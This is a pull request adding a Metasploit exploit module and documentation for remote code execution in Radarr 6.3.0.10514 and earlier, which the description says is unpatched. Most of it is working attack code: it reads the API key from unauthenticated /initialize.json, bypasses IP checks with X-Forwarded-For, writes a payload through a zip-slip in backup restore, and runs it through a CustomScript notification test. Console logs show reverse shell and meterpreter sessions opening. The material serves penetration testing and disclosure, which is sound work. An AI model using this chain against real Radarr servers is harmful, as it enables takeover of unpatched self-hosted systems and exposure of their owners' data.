### PR TITLE
Add Radarr RCE exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/radarr_customscript_rce.md
+++ b/documentation/modules/exploit/multi/http/radarr_customscript_rce.md
@@ -1,0 +1,165 @@
+## Vulnerable Application
+
+[Radarr](https://github.com/Radarr/Radarr) is an self-hosted movie collection manager ("PVR")
+from the *arr (Servarr) family, built on the same code base as Sonarr and Radarr. It
+is a long-running daemon that monitors RSS/Newznab/Torznab indexers for movie releases,
+decides which releases satisfy the user's quality profiles, hands them to a download client
+(SABnzbd, NZBGet, qBittorrent, Deluge, Transmission, rTorrent, uTorrent, Aria2, Flood,
+Download Station, and others), then imports, renames, and organizes the resulting media files
+on local or network storage. It writes metadata files for Kodi/Plex/Emby, triggers library
+refreshes on those media servers, and fires notifications through roughly thirty provider
+integrations. It listens on TCP port **7878** by default.
+
+This module chains three properties of a **default Radarr install** to gain remote code
+execution as the Radarr process user:
+
+1. **Unauthenticated API key disclosure.** Radarr ships with `AuthenticationMethod` set to
+   `None`, so an unauthenticated `GET /initialize.json` returns the instance API key in its
+   body. The key is administrative. If the `AuthenticationMethod` is configured as
+   `DisabledForLocalAddresses`, IP based access control can be bypassed using the
+   `X-Forwarded-For` HTTP header.
+2. **Zip-slip write primitive.** `POST /api/v3/system/backup/restore/upload` extracts archive
+   members with `Path.Combine()` and no path-containment check (`ArchiveService.ExtractZip`),
+   so a crafted member name (`../../../…/path`) writes a file anywhere the process can write.
+3. **CustomScript program execution.** `POST /api/v3/notification/test` for a `CustomScript`
+   notification executes an arbitrary on-disk program (path only — arguments are rejected) and
+   reports the exit code back in the response.
+
+The module drops the payload via the zip-slip primitive and then executes it via CustomScript,
+making the chain fully self-contained (it does not rely on any file already present on the
+target). The CustomScript folder denylist only covers `/bin /boot /lib /sbin /proc /usr/bin`
+(Linux) or the Windows directory, so the payload is dropped into a permitted location
+(e.g. `/tmp` or `C:\ProgramData\Radarr`) and then executed.
+
+Affected versions: Radarr builds up to and including **6.3.0.10514**. The module's `check`
+reads the reported version from `/initialize.json` and returns `Safe` for any newer build.
+
+### Setup
+
+Radarr can be run from a release binary, from source, or via Docker. Visit their
+[download](https://radarr.video/#download) page to get an installer for any supported system.
+
+- https://radarr.video/#download
+
+Browse to `http://<host>:7878/`, skip/complete the setup wizard, and leave authentication set
+to **None** (the default) to reproduce the unauthenticated variant. To test the authenticated
+fallback, set authentication to **Forms** and supply `USERNAME`/`PASSWORD` to the module.
+
+This module has been tested against Radarr **6.3.0.10514** on Linux and Windows.
+
+## Verification Steps
+
+1. Install and start Radarr with default (no-auth) settings.
+1. Start `msfconsole`.
+1. Do: `use exploit/multi/http/radarr_customscript_rce`
+1. Do: `set RHOSTS [ip]`
+1. Do: `set LHOST [your ip]`
+1. For a Unix target, do: `set ExecOverwritePath /path/to/existing/executable`
+1. Do: `run`
+1. You should get a command shell.
+
+## Options
+
+### USERNAME / PASSWORD
+
+Radarr credentials for **Forms** authentication. These are only used as a fallback: when
+`/initialize.json` does not disclose the API key (because authentication is configured to
+`Forms`), the module logs in with these credentials, captures the session cookie, and
+re-requests `/initialize.json` to recover the key. Leave blank against a default (no-auth)
+install.
+
+### APIKEY (advanced)
+
+An operator-supplied Radarr API key. When set, it takes precedence and the disclosure step is
+skipped — useful when you already hold the key or the target requires authentication that the
+supplied credentials cannot satisfy. Auto-disclosed from `/initialize.json` when blank.
+
+### DropPath (advanced)
+
+Absolute directory to drop the payload into. (Default: `/tmp` on Unix, `C:\ProgramData\Radarr`
+on Windows.) Must be a location the Radarr process can write to and that is **not** covered by
+the CustomScript denylist.
+
+### ExecOverwritePath (advanced)
+
+Unix only, and **required** for Unix targets. On Unix the extractor writes files without the
+execute bit (`File.Create`), so a freshly dropped file cannot be executed on a typical
+deployment. Set this to the absolute path of an existing executable (outside the denylist) so
+the payload overwrites it in place and inherits its `+x` mode. This file is deliberately **not**
+cleaned up afterwards, since it was not created by the module.
+
+On Windows this option is not needed: a dropped `.bat` is run through `cmd.exe /c` by Radarr's
+`ProcessProvider`, so no execute bit is required.
+
+### XForwardedFor (advanced)
+
+Value sent in the `X-Forwarded-For` header on every request. Helps against loopback/allowlist
+policies that key off the apparent client address. (Default: `127.0.0.1`)
+
+## Scenarios
+
+### Radarr 6.3.0.10514, AuthenticationMethod = None (or DisabledForLocalAddresses) install, Windows target
+
+```
+msf6 > use exploit/multi/http/radarr_customscript_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/radarr_customscript_rce) > set RHOSTS 192.0.2.10
+RHOSTS => 192.0.2.10
+msf6 exploit(multi/http/radarr_customscript_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/http/radarr_customscript_rce) > set LHOST 192.0.2.5
+LHOST => 192.0.2.5
+msf6 exploit(multi/http/radarr_customscript_rce) > check
+[*] Radarr version: 6.3.0.10514
+[+] Unauthenticated API key disclosed via /initialize.json: a1b2c3d4e5f6...
+[+] 192.0.2.10:7878 - The target is vulnerable. Radarr API key recovered and validated against /api/v3/system/status
+msf6 exploit(multi/http/radarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Radarr version: 6.3.0.10514
+[+] Unauthenticated API key disclosed via /initialize.json: a1b2c3d4e5f6...
+[+] Payload written to C:\ProgramData\Radarr\radarr_ab12cd34.bat
+[*] Executing C:\ProgramData\Radarr\radarr_ab12cd34.bat via notification/test...
+[*] Sending stage (203453 bytes) to 192.168.1.161
+[+] Deleted C:\ProgramData\Radarr\radarr_ab12cd34.bat
+[*] Meterpreter session 1 opened (192.168.1.188:4444 -> 192.168.1.161:49968) at 2026-08-20 17:07:19 +0300
+[*] No response from notification/test (payload may still have executed)
+
+meterpreter > 
+```
+
+### Radarr 6.3.0.10514 on Linux (overwriting an existing executable)
+
+Because the extractor does not set the execute bit on Unix, point `ExecOverwritePath` at an
+existing executable outside the denylist so the payload inherits its `+x` mode:
+
+```
+msf6 exploit(multi/http/radarr_customscript_rce) > set RHOSTS 192.0.2.20
+msf6 exploit(multi/http/radarr_customscript_rce) > set LHOST 192.0.2.5
+msf6 exploit(multi/http/radarr_customscript_rce) > set ExecOverwritePath /opt/radarr-scripts/notify.sh
+msf6 exploit(multi/http/radarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Radarr version: 6.3.0.10514
+[+] Unauthenticated API key disclosed via /initialize.json: a1b2c3d4e5f6...
+[+] Payload written to /opt/radarr-scripts/notify.sh
+[*] Executing /opt/radarr-scripts/notify.sh via notification/test...
+[*] Command shell session 1 opened (192.0.2.5:4444 -> 192.0.2.20:40318)
+
+id
+uid=1000(radarr) gid=1000(radarr) groups=1000(radarr)
+```
+
+### Authenticated fallback (AuthenticationMethod = Forms)
+
+When the target has Forms authentication enabled, `/initialize.json` is gated. Supply
+credentials and the module will log in, recover the key, and continue:
+
+```
+msf6 exploit(multi/http/radarr_customscript_rce) > set USERNAME admin
+msf6 exploit(multi/http/radarr_customscript_rce) > set PASSWORD s3cr3t
+msf6 exploit(multi/http/radarr_customscript_rce) > run
+[*] Started reverse TCP handler on 192.0.2.5:4444
+[*] Radarr version: 6.3.0.10514
+[+] API key recovered via Forms authentication: a1b2c3d4e5f6...
+[+] Payload written to /tmp/...
+...
+```

--- a/modules/exploits/multi/http/radarr_customscript_rce.rb
+++ b/modules/exploits/multi/http/radarr_customscript_rce.rb
@@ -1,0 +1,429 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # How many '../' segments to prepend to the zip-slip member name. The extractor
+  # (ArchiveService.ExtractZip) Path.Combine()s the stored name onto its temp
+  # directory with no containment check; excess climbs past the filesystem root
+  # are no-ops, so an over-deep prefix reaches an absolute drop path on any layout.
+  TRAVERSAL_DEPTH = 12
+
+  # First Radarr build that closes this chain. Any instance reporting a version
+  # strictly greater than this is treated as patched (CheckCode::Safe). The
+  # four-segment servarr scheme (major.minor.patch.build) compares numerically.
+  FIXED_VERSION = '6.3.0.10514'
+
+  # The notification/test body Radarr expects for a CustomScript provider. Every
+  # on* trigger is false; only implementation/configContract and the path field
+  # matter for the Test() action that performs the execution.
+  CUSTOM_SCRIPT_BASE = {
+    'onGrab' => false, 'onDownload' => false, 'onUpgrade' => false,
+    'onRename' => false, 'onMovieAdded' => false, 'onMovieDelete' => false,
+    'onMovieFileDelete' => false, 'onHealthIssue' => false,
+    'onHealthRestored' => false, 'onApplicationUpdate' => false,
+    'onManualInteractionRequired' => false,
+    'name' => 'msf', 'implementation' => 'CustomScript',
+    'implementationName' => 'Custom Script', 'configContract' => 'CustomScriptSettings'
+  }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Radarr Unauthenticated API Key Disclosure to Custom Script RCE',
+        'Description' => %q{
+          This module exploits Radarr to gain remote code execution as the Radarr
+          process user.
+
+          Radarr ships with AuthenticationMethod set to None, so an unauthenticated
+          request to GET /initialize.json returns the instance API key in its body.
+          If the AuthenticationMethod is configured as DisabledForLocalAddresses,
+          IP based access control can also be bypassed using the X-Forwarded-For HTTP
+          header. The API key is administrative: it unlocks POST /api/v3/notification/test,
+          which for a CustomScript notification executes an arbitrary on-disk program (path
+          only, arguments are rejected) and reports the exit code back in the response.
+
+          RCE vulnerability on its own only executes a file that already exists on the
+          target, so this module makes the chain self-contained by first dropping the payload
+          via the backup-restore zip-slip: POST /api/v3/system/backup/restore/upload
+          extracts archive members with no path containment, allowing a file to be written
+          anywhere the process can write. The CustomScript folder denylist only covers
+          /bin /boot /lib /sbin /proc /usr/bin (Linux) or the Windows directory, so the
+          payload is dropped into a permitted location (e.g. /tmp or C:\ProgramData\Radarr)
+          and then executed.
+
+          On Windows a dropped .bat is run through "cmd.exe /c" by Radarr's
+          ProcessProvider, so no execute bit is required and delivery is reliable. On
+          Unix the extractor writes files without the execute bit (File.Create), so the
+          fresh-drop path is executable only where the deployment permits it; set
+          ExecOverwritePath to an existing executable (outside the denylist) to overwrite
+          it in place and inherit its mode for a reliable Unix session.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balci <egebalci[at]pm.me>' # Metasploit module and discovery
+        ],
+        'References' => [
+          ['CVE', '2026-30975'],
+          ['URL', 'https://github.com/Radarr/Radarr'],
+          ['URL', 'https://wiki.servarr.com/radarr/settings#security']
+        ],
+        'DisclosureDate' => '2026-08-16',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7878),
+        OptString.new('TARGETURI', [true, 'Base path to the Radarr application', '/']),
+        OptString.new('USERNAME', [false, 'Username for Radarr forms authentication (used as a fallback when API key disclosure fails)', '']),
+        OptString.new('PASSWORD', [false, 'Password for Radarr forms authentication (used as a fallback when API key disclosure fails)', ''])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('APIKEY', [false, 'Radarr API key (auto-disclosed from /initialize.json when blank)', '']),
+        OptString.new('DropPath', [false, 'Absolute directory to drop the payload into (default: /tmp or C:\\ProgramData\\Radarr)', '']),
+        OptString.new('ExecOverwritePath', [false, 'Unix only: absolute path of an existing executable to overwrite in place, inheriting its +x mode', '']),
+        OptString.new('XForwardedFor', [false, 'X-Forwarded-For header value sent with each request', '127.0.0.1'])
+      ]
+    )
+  end
+
+  def check
+    key = disclose_api_key
+
+    # Version gate: a build newer than the fixed release is not exploitable
+    # regardless of whether a key could be read, so report Safe as soon as the
+    # version is known to be patched.
+    if @radarr_version
+      print_status("Radarr version: #{@radarr_version}")
+      if version_patched?(@radarr_version)
+        return CheckCode::Safe("Radarr #{@radarr_version} is newer than the fixed build #{FIXED_VERSION}")
+      end
+    end
+
+    if key.nil?
+      # The endpoint answered but did not hand out a key: authentication is
+      # configured. The execution half still works with a supplied APIKEY, so
+      # this is not strictly Safe when the operator provides one.
+      return CheckCode::Safe('/initialize.json did not disclose an API key; authentication appears to be configured') if @initialize_responded
+
+      return CheckCode::Unknown('Target did not respond to /initialize.json')
+    end
+
+    if @authenticated
+      print_good("API key retrieved after authenticating as #{datastore['USERNAME']}: #{key}")
+    else
+      print_good("Unauthenticated API key disclosed via /initialize.json: #{key}")
+    end
+
+    if api_key_authenticates?(key)
+      CheckCode::Vulnerable('Default AuthenticationMethod=None: API key disclosed and validated against /api/v3/system/status')
+    else
+      CheckCode::Appears('API key disclosed by /initialize.json but could not be validated against the API')
+    end
+  end
+
+  def exploit
+    key = api_key
+    fail_with(Failure::NoAccess, 'No API key available (disclosure failed and APIKEY is unset)') if key.nil?
+
+    if !windows_target? && datastore['ExecOverwritePath'].to_s.empty?
+      fail_with(Failure::BadConfig, 'ExecOverwritePath parameter is mandatory for Unix tagets')
+    end
+
+    remote_path = plant_payload(key)
+    print_good("Payload written to #{remote_path}")
+
+    print_status("Executing #{remote_path} via notification/test...")
+    execute_custom_script(key, remote_path)
+  end
+
+  # The API key used for the authenticated half of the chain: an operator-supplied
+  # one takes precedence, otherwise the disclosed key is reused.
+  def api_key
+    configured = datastore['APIKEY'].to_s
+    return configured unless configured.empty?
+
+    @api_key ||= disclose_api_key
+  end
+
+  # Step 1: GET /initialize.json with no credentials. On a default install
+  # (AuthenticationMethod=None) the NoAuthenticationHandler always succeeds and the
+  # controller emits the API key straight into the JSON body. When authentication
+  # is configured the anonymous request is turned away, so fall back to a forms
+  # login with USERNAME/PASSWORD (if supplied) and re-read the page with the
+  # resulting session cookie.
+  def disclose_api_key
+    @initialize_responded = false
+    @authenticated = false
+
+    res = fetch_initialize
+    return nil if res.nil?
+
+    @initialize_responded = true
+    key = extract_api_key(res)
+    return key unless key.nil?
+
+    # Anonymous read failed. Try authenticated retrieval only when creds exist.
+    return nil unless credentials?
+
+    cookie = authenticate
+    return nil if cookie.nil?
+
+    res = fetch_initialize(cookie)
+    return nil if res.nil?
+
+    key = extract_api_key(res)
+    @authenticated = true unless key.nil?
+    key
+  end
+
+  # GET /initialize.json, optionally carrying a session cookie from a prior login.
+  def fetch_initialize(cookie = nil)
+    headers = extra_headers
+    headers = headers.merge('Cookie' => cookie) unless cookie.to_s.empty?
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'initialize.json'),
+      'headers' => headers
+    )
+  end
+
+  # Pulls the version and (when present) the API key out of an /initialize.json
+  # response. Returns nil for anything that is not a 200 carrying an apiKey.
+  def extract_api_key(res)
+    return nil unless res.code == 200
+
+    body = res.body.to_s
+    @radarr_version = body[/"version"\s*:\s*"([^"]+)"/, 1]
+    body[/"apiKey"\s*:\s*"([^"]+)"/, 1]
+  end
+
+  # Whether both USERNAME and PASSWORD were supplied for the auth fallback.
+  def credentials?
+    !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty?
+  end
+
+  # Performs Radarr's forms login (POST /login) and returns the session cookie
+  # string on apparent success, or nil. Radarr sets its auth cookie and 302s to
+  # the return URL on success; a bad login re-renders /login without that cookie.
+  # Correctness of the cookie is confirmed by the follow-up /initialize.json read.
+  def authenticate
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'headers' => extra_headers,
+      'vars_post' => {
+        'username' => datastore['USERNAME'].to_s,
+        'password' => datastore['PASSWORD'].to_s,
+        'rememberMe' => 'on'
+      }
+    )
+    if res.nil?
+      vprint_error('No response from /login')
+      return nil
+    end
+
+    cookie = res.get_cookies.to_s.strip
+    if cookie.empty?
+      vprint_error("Login as #{datastore['USERNAME']} did not return a session cookie")
+      return nil
+    end
+
+    cookie
+  end
+
+  # True when the reported version is strictly newer than the fixed build.
+  # Rex::Version (a Gem::Version subclass) compares the four servarr segments
+  # numerically; a version string that cannot be parsed is treated as not patched.
+  def version_patched?(version)
+    Rex::Version.new(version) > Rex::Version.new(FIXED_VERSION)
+  rescue ArgumentError
+    false
+  end
+
+  # Confirms the disclosed key is administrative by hitting an authenticated
+  # endpoint. Used only to strengthen the check verdict.
+  def api_key_authenticates?(key)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v3', 'system', 'status'),
+      'headers' => extra_headers.merge('X-Api-Key' => key)
+    )
+    res && res.code == 200
+  end
+
+  # Drops the payload onto the target and returns the absolute path the
+  # CustomScript notification must point at. On Unix an operator can redirect the
+  # write over an existing executable so it inherits the +x bit.
+  def plant_payload(key)
+    remote_path = target_script_path
+    zip_entry = slip_entry_name(remote_path)
+    vprint_status("Zip-slip member name: #{zip_entry}")
+
+    upload_backup_restore(key, zip_entry, script_body)
+
+    # FileDropper removes the artifact once a session is established. Skip cleanup
+    # of a deliberately overwritten executable, which was not ours to delete.
+    register_files_for_cleanup(remote_path) if datastore['ExecOverwritePath'].to_s.empty?
+    remote_path
+  end
+
+  # Write primitive: POST a zip whose single member escapes the extraction
+  # directory. ArchiveService.ExtractZip Path.Combine()s the stored name with no
+  # containment, so the member lands at our absolute path. The restore then throws
+  # a 404 (no allowlisted db/config member) *after* the write has already happened,
+  # so any of 200/404/500 means the drop succeeded.
+  def upload_backup_restore(key, entry_name, data)
+    zip = Rex::Zip::Archive.new
+    zip.add_file(entry_name, data)
+
+    post = Rex::MIME::Message.new
+    post.add_part(zip.pack, 'application/zip', 'binary', %(form-data; name="file"; filename="backup.zip"))
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v3', 'system', 'backup', 'restore', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{post.bound}",
+      'data' => post.to_s,
+      'headers' => extra_headers.merge('X-Api-Key' => key)
+    )
+    raise 'No response from backup restore endpoint' if res.nil?
+
+    case res.code
+    when 401, 403
+      fail_with(Failure::NoAccess, 'Backup restore rejected the API key (401/403)')
+    when 415
+      fail_with(Failure::UnexpectedReply, 'Backup restore rejected the archive extension (415)')
+    when 200, 404, 500
+      # 404 "Unable to restore database file from backup" is expected: the write
+      # already occurred during extraction, before the allowlist check failed.
+      vprint_status("Backup restore returned HTTP #{res.code} (write completes regardless)")
+    else
+      fail_with(Failure::UnexpectedReply, "Unexpected backup restore status: HTTP #{res.code}")
+    end
+  end
+
+  # Step 2: POST /api/v3/notification/test with a CustomScript pointing at
+  # the dropped file. Test() -> ExecuteScript() -> ProcessProvider.StartAndCapture
+  # runs the program. The payload backgrounds itself, so the request returns quickly
+  # instead of blocking on WaitForExit; a session lands on the handler.
+  def execute_custom_script(key, remote_path)
+    body = CUSTOM_SCRIPT_BASE.merge('fields' => [{ 'name' => 'path', 'value' => remote_path }])
+
+    begin
+      res = send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'api', 'v3', 'notification', 'test'),
+          'ctype' => 'application/json',
+          'data' => body.to_json,
+          'headers' => extra_headers.merge('X-Api-Key' => key)
+        },
+        20
+      )
+    rescue ::Timeout::Error
+      # The backgrounded payload can still hold the request open; the session is
+      # what matters, so a timeout here is not a failure.
+      print_status('notification/test request timed out (payload likely running)')
+      return
+    end
+
+    if res.nil?
+      print_status('No response from notification/test (payload may still have executed)')
+      return
+    end
+
+    if res.body.to_s.downcase.include?('does not exist')
+      fail_with(Failure::PayloadFailed, 'Radarr reports the payload path does not exist; the zip-slip write did not land where expected')
+    end
+
+    vprint_status("notification/test -> HTTP #{res.code}: #{res.body.to_s[0, 160]}")
+  end
+
+  # Absolute path the payload is written to and executed from.
+  def target_script_path
+    overwrite = datastore['ExecOverwritePath'].to_s
+    return overwrite unless overwrite.empty?
+
+    if windows_target?
+      dir = drop_dir('C:\\ProgramData\\Radarr')
+      "#{dir.chomp('\\')}\\radarr_#{Rex::Text.rand_text_alphanumeric(8).downcase}.bat"
+    else
+      dir = drop_dir('/tmp')
+      "#{dir.chomp('/')}/radarr_#{Rex::Text.rand_text_alphanumeric(8).downcase}.sh"
+    end
+  end
+
+  def drop_dir(default)
+    configured = datastore['DropPath'].to_s
+    configured.empty? ? default : configured
+  end
+
+  # Turns an absolute target path into a traversal member name. The drive letter
+  # (Windows) or leading slash (Unix) is stripped and replaced with '../' climbs;
+  # zip members always use forward slashes, which both OSes accept at open time.
+  def slip_entry_name(abs_path)
+    rel = abs_path.sub(/\A[A-Za-z]:/, '').sub(%r{\A[\\/]+}, '').tr('\\', '/')
+    ('../' * TRAVERSAL_DEPTH) + rel
+  end
+
+  # The payload wrapped so notification/test's synchronous WaitForExit returns
+  # promptly: '&' on Unix, "start /b" on Windows.
+  def script_body
+    if windows_target?
+      "@echo off\r\nstart \"\" /b #{payload.encoded}\r\nexit /b 0\r\n"
+    else
+      "#!/bin/sh\n#{payload.encoded} &\nexit 0\n"
+    end
+  end
+
+  def windows_target?
+    target['Platform'] == 'win' || target.platform.platforms.include?(Msf::Module::Platform::Windows)
+  end
+
+  # Common request headers. X-Forwarded-For mirrors the PoC and helps against
+  # loopback/whitelist policies that key off the apparent client address.
+  def extra_headers
+    xff = datastore['XForwardedFor'].to_s
+    xff.empty? ? {} : { 'X-Forwarded-For' => xff }
+  end
+end


### PR DESCRIPTION
Hello 👋

This module chains together 4 vulnerabilities on Radarr to achieve unauthenticated remote code execution. Versions `<= 6.3.0.10514` are affected. This RCE chain was reported to the Radarr team; however, no patches are available yet. Three of the following vulnerabilities are currently 0-day, and no CVEs are reserved. 

- Authentication Bypass `CVE-2026-30975`
- Unauthenticated API key disclosure `0-Day`
- Zip-slip `0-Day`
- Arbitrary Code Execution via CustomScript `0-Day`

## Testing
For installing the vulnerable version follow the steps below, 
1. Download the installation file of the vulnerable software [here](https://radarr.video/#download) (Windows installer is the easiest)
2. Follow the installation steps.
3. After completing the setup, the Radarr service should be accessible on port **7878**.
4. Browse to `http://<host>:7878/`, skip/complete the setup wizard, and leave authentication set to **None** (the default) to reproduce the unauthenticated variant or select `DisabledForLocalAddresses` option for using the `X-Forwarded-For` bypass.

## Verification
List the steps needed to make sure this thing works

1. Install and start Radarr with default (no-auth) settings.
2. Start `msfconsole`.
3. Do: `use exploit/multi/http/radarr_customscript_rce`
4. Do: `set RHOSTS [ip]`
5. Do: `set LHOST [your ip]`
6. For a Unix target, do: `set target 1`
7. For a Unix target, do: `set ExecOverwritePath /path/to/existing/executable`
8. Do: `run`
9. You should get a command shell.